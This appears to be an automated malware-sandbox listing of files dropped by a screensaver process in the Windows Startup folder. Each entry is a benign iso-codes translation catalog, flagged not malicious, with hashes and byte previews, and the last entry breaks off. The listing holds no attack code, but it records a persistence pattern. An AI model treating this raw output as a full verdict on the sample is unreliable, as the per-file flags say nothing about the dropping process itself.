                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 397 messages, Project-Id-Version: iso_3166-1 '\340\246\206\340\246\253\340\246\227\340\246\276\340\246\250\340\246\277\340\246\270\340\247\215\340\246\245\340\246\276\340\246\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33554
                                                                                                    Entropy (8bit):4.991609355548515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:m5ME/TwzvwlXmsOP4XJOAjyIGI99am2xuECGoiVMyoD98QxxIrOAw:ZEYIGIbam2xuJGoiVMyoD98QxxIrOAw
                                                                                                    MD5:40405175E15CB5A47982C91436A49B1F
                                                                                                    SHA1:B2CD26DEDF8D9FD64C0CCA17B794C122A8EC600C
                                                                                                    SHA-256:BC73D7040852D9942AFD860339F5E953E8B05BC330F61CD1D3717F5EC6005623
                                                                                                    SHA-512:EDDCC4A05558C0CD3A8501BA9A5011DD34267667C7879B503A6B2030A6423CAF20DAD7AA3025868FDC305D542B258326E7116DAA383CE5B19FA71CCC0B300792
                                                                                                    Malicious:false
                                                                                                    Preview:................................`!......a!......m!......u!......}!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......""......*"......2"......="......F"......N"......V"......]"......c"......k".. ...r".......".......".......".......".......".......".......".......#......&#......8#......A#......N#......V#......_#......h#......o#......~#.......#.......#.......#.......#.......#.......#.......#.......#..,....$......<$......D$..%...J$......p$......}$.......$.......$.......$.......$.......$..%....$..,....$.."....%..*...0%......[%......c%......l%......u%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&..'....&..$...;&......`&......|&.......&.......&.......&.......&.......&.......&.......&.......'.......'......4'......:'......L'......S'......['......c'......i'......s'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'..!....(......)(......;(......Y(......b(..0...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\246\254\340\247\215\340\247\260\340\246\277\340\246\237\340\246\277\340\246\266\340\247\215\340\246\254 \340\246\206\340\246\250\340\247\215\340\246\237\340\246\276\340\247\260\340\247\215\340\246\225\340\246\237\340\246\277\340\246\225 \340\246\205\340\246\236\340\247\215\340\246\232\340\246\262'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4070
                                                                                                    Entropy (8bit):5.1752542138203745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDtdLpAiWVeyBooLeP2tcUw0+A5+wQtTjHNgG:qDvLW5qnOtKAotTOG
                                                                                                    MD5:CF9E3E71779FA179748759FE784AA0EE
                                                                                                    SHA1:37C5DC18E0750C3471ACF495326E397AC55679DA
                                                                                                    SHA-256:E6F0FCB7476890BB4AD603CD2ADD4E960DD9BCE60AA73A74B3D452538D44FD07
                                                                                                    SHA-512:D79905E1AE7038767C8C21A9DE2379790D4A070A2F78DB70B6B7CAD24CC3864E620BFB1E94E317CFF9F21FF15C477FD3AE2D77A0E9D8615E0121019CC2D45D73
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................M...]...u...........!...].......................,...............?.......?...7...d...w...Y.......N...6..."...............4.......%......."...2...\...U...,.......G...........'...+...=...y...i...........A...v...]...................0...1............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_15924
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.147489183732665
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxCfGCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGuWXmBQ8KMW0YEi9:i4n1xxCfVt02Ukx/iximCg5ITvWXmBQV
                                                                                                    MD5:A3D30FACDDCE70BC5B3C0AB8F55A07EB
                                                                                                    SHA1:9C37DDC26CD4B90074EBA86AD7C79FE093835C3E
                                                                                                    SHA-256:A221945FF653B6E9C4E112DE80EDFD93F92560949822DE8542F79DDE3E141845
                                                                                                    SHA-512:52670041BFEECCEA14950D272D366A591BFA69BA5F370D0E71D8893739D68B54A786E19A2F96B18166965DA7F407CC8F5F37D62B776CF2E502D391B39E7900B2
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ast.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 405 messages, Project-Id-Version: iso_3166-1 'Afghanist\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22752
                                                                                                    Entropy (8bit):5.052681289691024
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:/FtCOYS49fGRlmuIbwlvpla0kk5Kr8jq5wsOP4XJOAE1i3qxa4vkKEd4Agkz:dUz902wlvplWk5r+msOP4XJOAE7LvzEp
                                                                                                    MD5:635592668B7F0C99FBAB563488ED00E1
                                                                                                    SHA1:1E3680A3C19EB0E545DAD0D987B6D7566A687960
                                                                                                    SHA-256:47F31E299D330A5A769BDCBDC3D5BC52585A0768368404972B0E1187F57DD28F
                                                                                                    SHA-512:6E61B5094EB34FA983D5A25787E21BC8490711B4E91278A2D8A894C25C486BD57FD34A255C75D38EE61905B59E9607418BA89317E4270950B3C96D93C12F88CC
                                                                                                    Malicious:false
                                                                                                    Preview:........................l........!.......!.......!.......!.......!......."......."......."......$"....../"......C"......Z"......d"......w".......".......".......".......".......".......".......".......".......".......".......".......".......".......".. ....".......#.......#.. ...;#......\#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......8$......=$......C$......I$......Z$......r$......{$.......$..,....$.......$.......$..%....$.......%.......%......)%......1%......6%......?%......F%......U%..%...d%..,....%.."....%..*....%.......&.......&.......&.......&......2&......N&......V&......\&......h&......z&.......&.......&.......&.......&..'....&..$....&.......'......&'......B'......a'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(......7(......>(......H(......P(......[(......`(......j(......s(......z(.......(.......(.......(..!....(.......(.......(......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):373
                                                                                                    Entropy (8bit):5.153049948077457
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijWYYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGuWXmBQ8KMW0YEi9:i4Wxx8t02Ukx/iximCg5ITvWXmBQWi9
                                                                                                    MD5:70DF24440AE5FE7E23BFA062FAFE18AF
                                                                                                    SHA1:C9B6551112ECCC47B7469C3EB8C49CAA2D0D994B
                                                                                                    SHA-256:FCC86305AC479397A0EBE9EDB2FA849E6631A790C3E51B786A928E00C4A311E4
                                                                                                    SHA-512:7492843802C355AB2A8C27A2EAC9B5D2909D843421CC25A8D8CB9A0C3529534D3376BCE896A3B80C80218DB70F9CB72FD1658115858CFA708E6650ABE2655474
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...;...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ast.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Territoriu Brit\303\241nicu Ant\303\241rticu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2670
                                                                                                    Entropy (8bit):5.209287354757367
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADAU+wevGqIfdvqNuoU8jWjnVQTXzIQgnV:qDP+pyBo8jnCXngnV
                                                                                                    MD5:30E67C740B066DA46ED0008B92A4ED60
                                                                                                    SHA1:F0743364078C9BEE27729BCDC63108FD167AF117
                                                                                                    SHA-256:AE641A55DAFE5D2DA75E73BA69BCEEC94D841441BA604620405CC8D8E46AB7FA
                                                                                                    SHA-512:7C4B8FBF9FC70B7ECBEEC3C62778003F3A2A02C8C4C99BCD6C9C8E639312E0B8CB914F629AB884CFACE817D4DC4372220B3FE3011A2E3D6ED258F9B4A9AC778F
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c................... .............../..............."...........6.......>.......S.......^.......u...*....... ...........................................#.......0.......:.......O.......`.......t.......{...........6...............$..........."...*...-.......X........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_4217
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.147848694194945
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxkXCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGuWXmBQ8KMW0YEi9:i4cxxRt02Ukx/iximCg5ITvWXmBQWi9
                                                                                                    MD5:CC4BD031076F43D8320651A458C7DE24
                                                                                                    SHA1:68AC504DE810A1A4B2AF0E50D0B5E6080102F405
                                                                                                    SHA-256:28D3E35DD9807D2868894DF026FCA8C76DA615DF8DE940286D5FC39A2CAC8598
                                                                                                    SHA-512:6170A3AC144670FDBF7178FAB1CBA7C253AB1D15C1CC3372056407618E94DD442A3236A7DA7178A0C3A13825F20F58DF9A7080A9FA90C681FBF7CC8121A23B8B
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ast.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7442 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):311331
                                                                                                    Entropy (8bit):5.2239869106763095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:Iv0FtOe4nzIm1u4osRPy51/T6Wzfy9Bz/Hy3hY2XxlE8cZP3z2u:a0FoMmM5sorgxvgK2TzGfKu
                                                                                                    MD5:96BC2DB103734A1923877380FAFCD807
                                                                                                    SHA1:AF387E673559E1B5050E532BF4C0D63A89B98EFC
                                                                                                    SHA-256:60C010FB619678A2EA319CFC181D2536D6B64F3EAB69B930408E2FD6A83DDFED
                                                                                                    SHA-512:2B38978E25AAFBE1C7D2B85B20088913943C2BE30341C55743392D467E358F9E58CB0206F3C408FE43BC567EFF0AF98737BF81EA5B3E580F3376967D42DAF096
                                                                                                    Malicious:false
                                                                                                    Preview:.....................&..<.......Hl......Il......Rl......\l......al......ll......ql......xl......~l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......m.......m.......m.......m.......m.......m......"m......'m....../m......6m......;m......Cm......Hm......Qm......]m......lm......um......{m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......n.......n.......n.......n......%n......,n......1n......8n......@n......Dn......Jn......On......dn......kn......tn......~n.......n.......n.......n.......n.......n.......n.......n.......n.......n.......n.......n.......n.......n.......o.......o......(o......5o......Eo......Uo......co......xo.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......p.......p.......p.......p.......p......,p......9p......?p......Gp......Mp......[p......jp......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_639-5 'Lling\303\274es Afro-Asiatiques'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4029
                                                                                                    Entropy (8bit):4.869029674602663
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5q3GMhqnlhGTMkKiTbE1ayDu3KK0UL30ULf+qadXQvhr/CUJhvjv3Zm1TEhHUcAT:0WMjyiPrR0E0C+fIC0hvjvwEhHUcNNG
                                                                                                    MD5:58561BDA970A4B02791F5A7E6CB05C09
                                                                                                    SHA1:4DF680D7A7894A35B83A8DCBA860C767D90AD63B
                                                                                                    SHA-256:AA7F967BD81D85EFCF11830B3E1ADCDEAE2F00E7B906093626D7E8B5B38631EC
                                                                                                    SHA-512:E9ADCB94D3D8EB30E6646D841F2EF805863506870F86AF9B2911D060850C2610B2EFB749869A10BBC021344E15A46C24244DFD2CD1DBEED3BB412A00F72267CA
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......P.......e.......v.......................................................................!.......2.......C.......W...!...h...................%...........................................&.......4.......D.......\.......n.......................................................................................:.......Q.......q...............................................................................).......:.......K.......].......o.......}...........................:...........................*.......;.......M.......d.......{.......................................................................*...'...?.......g.......x...(...........................................................+.......C.......V.......j.......z.......................................................................#...)...:.......d.......u....................................................................... .......1.......G.......Y.......k.......y.......................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):521
                                                                                                    Entropy (8bit):5.312363360655273
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4X6xxLtt02UkEFA/xtLLif/4F+/MWXmBQWiOWzBl:RXAjt0UEq8/nXmGzBl
                                                                                                    MD5:F45ABE0D3176D7FB98DEA75F5A59F4B6
                                                                                                    SHA1:CCAD71BFA7DCAF112F21D71B870D94890347B5F2
                                                                                                    SHA-256:70182056983E72F838F7AFEBD4FDA23FC73AA57795E6D5C0587788E0C5068D2F
                                                                                                    SHA-512:0F9534BB20647188F30529BB78AE671530FEF5D39377DD912B0B0F1FD191FDB81977EEE4AB820326B203156AE0EB702B2B54620FCDBE4A1C0243279395B66D09
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-25 23:20+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Aymar. <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ay/>.Language: ay.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=1; plural=0;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 222 messages, Project-Id-Version: iso_3166-1 '\306\217fqan\304\261stan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10337
                                                                                                    Entropy (8bit):4.909478571705019
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:5qSL2dsP4XQ/ufvchQRKTbFsA6/WJrx96FgH0DssdPShSbeJDOoP6hK:M7dse8ufv0QRKts7/WJV86Ugsd/JoPP
                                                                                                    MD5:59A7B53840327621BFA026A622AA512A
                                                                                                    SHA1:D921796606D64B4556D394289F85C6E92E1BB834
                                                                                                    SHA-256:615596D65A24C632AA389BAD551A26EAC2307762A0836FFEF437B1D0652FCB6D
                                                                                                    SHA-512:CDD502540169BA9C7366954E55AEE290A9CCC778C14BC861B06B887306D15E601F6B77A04CE06DE69876A15436CA19441CC839D74540B33FBD45654A1F71C14A
                                                                                                    Malicious:false
                                                                                                    Preview:....................3...........................................................................................+.......5.......=.......C.......M.......U.......`.......h.......p.......{...............................................................................................................,.......>.......G.......T.......\.......e.......n.......u...............................................................................................................................).......8.......@.......I.......R.......e.......m.......s...............................................................................................................................$.......*.......4.......N.......U......._.......g.......r.......w.......................................................................................................................!.......(...............6.......<.......C.......N.......T...&...].......................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 68 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3341
                                                                                                    Entropy (8bit):4.827079701599104
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:KPhjzYDmlyetmHmzurwBP4g0hNbGP+fDdnCRlc1hSzKeaaj5UZ/Uh0ZyeZYOiWfZ:QS+Z23Vbpx1hHla6/ZZyeZXibCdIGE0
                                                                                                    MD5:F1DE1C515AEC2A4024A8C85529A66BAA
                                                                                                    SHA1:8D5BEBC99ABAABBAC28974BF98B5D09784479DF3
                                                                                                    SHA-256:28EAB7983C3D0D8512FAB8E426E50F9F1E06CBE5003A2F15352B848B85789510
                                                                                                    SHA-512:19E2EB7B145136B97BCBB1278171A4D6A0C21FC4D30CDA683D1BE0266930B057225716C52248ABF50C832B520397CD1193474DAB819D84A94774BBBCC988936B
                                                                                                    Malicious:false
                                                                                                    Preview:........D.......<...a...\.......................................................................................:.......C.......X.......a.......i.......t.......y...............................................................................................................................................................(.......6.......A.......L.......U.......[.......j.......w...............................................................................................................$...........$...4.......Y.......^.......f.......o.......z.......................................6.......>.......F.......N.......].......f.......l.......r.......................................................................................................................................................$.......-.......:.......C.......M.......W......._.......h.......o.......}...............................................................................................................%.......>.......I.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Holland Antill\311\231ri'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):497
                                                                                                    Entropy (8bit):5.1986872203643015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilVWmwuHNNGYxA9Ct0vOuvP0NXzffUaX//RMxIVvLKL2AF0l/Wnoq3XmBQ8KMW0T:iBwK1xjt02Ukp/SiULL0ZWp3XmBQWia7
                                                                                                    MD5:CDD099F08E218745E59175114B166AD3
                                                                                                    SHA1:438B1A5303CE42FE7B858DFECC76BFBB072A8D5C
                                                                                                    SHA-256:0923CDA2C66F2148283A69AA8724F4A12795DA67E5A2E6E3BF5AD9581D9650C0
                                                                                                    SHA-512:BCC419617958DA98B1E3077959E6D659294A390096357A48417F0BB368E533DAEB889B2B0169D701FA640D19087E921B4BDE757411B23AEB132C1768ABFFB4C6
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...w...f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-02-09 15:15+0200.Last-Translator: Metin Amiroff <metin@karegen.com>.Language-Team: Azerbaijani <translation-team-az@lists.sourceforge.net>.Language: az.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Holland Antill.ri.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 26 messages, Project-Id-Version: iso_639-3 'Afrika'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1431
                                                                                                    Entropy (8bit):4.960255867660081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3m2bQSiDo3WWFt5wOpz+Vt0USnHmvORXmmwY0P0lWUyo:2228/rwIz+MUSGhmdJx1
                                                                                                    MD5:59E904E68A52F2C0AF7237BB5F8D721A
                                                                                                    SHA1:9DD8D750E8033BD78C1E19C400A58D08A941417E
                                                                                                    SHA-256:0A3963900F050430F43EC5F410AAB22C7AAA023F87E52C25F087D679240262DA
                                                                                                    SHA-512:DB2898D274B7E727C800E749352D359478D47949D34D96106A9D5D904689FDD4F5E93746F7EF8060C3FCE78FD156BA36AB7883F095897EC3151FCA1F024A02E8
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........P.......Q.......[.......b.......j.......s.......y...............................................................................................................................................................&...............................................................................................!.......+.......4.......<.......D.......L.......R.......\.......g.......p.......y................................................................................................................................................................................Afrikaans.Arabic.Chinese.Croatian.Dutch.Faroese.French.Hebrew.Hungarian.Icelandic.Indonesian.Irish.Italian.Japanese.Korean.Latvian.Lithuanian.Macedonian.Norwegian.Polish.Portuguese.Russian.Thai.Turkish.Vietnamese.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2001-07-28 11:19GMT+0200.Last-Translator: Vasif .smay.lo.lu <aze
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):526
                                                                                                    Entropy (8bit):5.289706156371071
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i40ExxLtt02UkH/n/xtLL1hm/4FfzMXmBQWiOWRl:R0ijt0UH3tg/FXmGRl
                                                                                                    MD5:72E69251BDDEFB4FEF3C3FABE7577CCB
                                                                                                    SHA1:AF49B7E47EE55D8912DDE43C61B4D9861734A2B5
                                                                                                    SHA-256:57E335D7C30DB683F577C21EA36F018D9526F2B36DEFF86FE6D21659D788C7E8
                                                                                                    SHA-512:BF4451EB109B24D26DB92BF29A994A01F67AB8BED8C1BB65C75911BEF7B765D2538F804F054455EC37A6096D0ECAEA0D5872B46A16E8FCAF43B8D76D8BB558FE
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-26 01:29+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Bashkir <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ba/>.Language: ba.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 153 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6864
                                                                                                    Entropy (8bit):4.731637497302333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4bn6wPlAieC2HdiuSamRFNPA6hDTTW6PdzWPuK8JkayCleefaF/WWrXc0/UG9JWF:4bhiTIuHmRJhDT6GdzWPZ8yLS5kJUGnc
                                                                                                    MD5:63A9CDEE97C39F2FBCCDBB7E596F592A
                                                                                                    SHA1:BB38B03AFD4692F9F79D76D03469F15CBE48F25D
                                                                                                    SHA-256:648A7DBB3EBBE6F449C777FCDEF1A6924CF45FF048E0AD4408BDAD973E076218
                                                                                                    SHA-512:297455F6BD0546835917A8BC56C0A2BFB75B4BF206657DF3E57F124287D177B69908C1D8CB9546BFB174DBA541C4E199FB3260EB93B9FF6515749DA4B908E619
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................$.......,.......3.......G.......Q.......Y......._.......i.......q.......|....................................................................................................................... .......).......0.......5.......;.......D.......O.......W.......\.......e.......l.......{.......................................................................................................................................".......*......./.......9.......@.......F.......O.......Y.......a.......i.......o.......y.......~.......................................................................................................................................................#.......).......0.......8.......?.......H.......S.......[.......c.......k.......q.......w.......................................................................................................................".......).......2.......>.......D.......L.......U.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\320\260\320\264\320\273\320\260\320\274\321\201\320\272\320\260\320\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12701
                                                                                                    Entropy (8bit):5.263797292433121
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dpzqMIoeltU4WjV9qWxa5hW8NT1T1hobWkZwZ4WvvKpKm2P6yyCE:vooeg4WjVDxa5hW8N0bwaWH83d
                                                                                                    MD5:7144F2AFC6EA84544F5099CF6D0D5FFF
                                                                                                    SHA1:D2420BA1544B64C453620C4E48AE38A46A21DCD0
                                                                                                    SHA-256:FCDD33624457851C5CE8E63FB8CD2711D4D34069097A68CF25BC1EB1E32463E1
                                                                                                    SHA-512:760E01ACCFAFA3260A4BD0858B69E9E9FC2C129685CD004C40DF6CD8874874D80D478DED4536D6D44E020C00CD22965FECAA500346ECB57CEBCA57B66222AE05
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\321\226\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30045
                                                                                                    Entropy (8bit):5.319502357833616
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0oxGQe48fmsWP48WAI91qjlePG0QbleLBB5wXNQf8TIdMWEcE1ZRFCqiZc:bxBe48fkiG0QbleLBB5wXNQf8TfFCxZc
                                                                                                    MD5:E96C198894BAF4FF740F9B1C9A17920E
                                                                                                    SHA1:283D581C6244DA8FBC3ED9ED4E724923D684E803
                                                                                                    SHA-256:04BCE144C80AA116C2747FFE211DA4B6BC68525BFBBA6C778B7BCB8666E932D0
                                                                                                    SHA-512:E3A5FA0BA4D383BD15B65B6B70E77F38ED92E3CBBA55B6CF7CB8D2D8854E5F4B68C8210B5B3F2E5606269DAD38170672CE25B18EE40B844BA8D2282A14725040
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3778 messages, Project-Id-Version: iso_3166-2 '\320\255\321\236\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194548
                                                                                                    Entropy (8bit):5.452541267198276
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:3QZtF+yxuKxqoJlx0RiGNOIddU9uPMD1tJM8z4g7t8HPZ2HKoBqtmQ/n7UZWHszv:AhkTCOi1IMDTJh42K4M2gXVCha0
                                                                                                    MD5:AE185AEF65C3A8C685C94B32F6425696
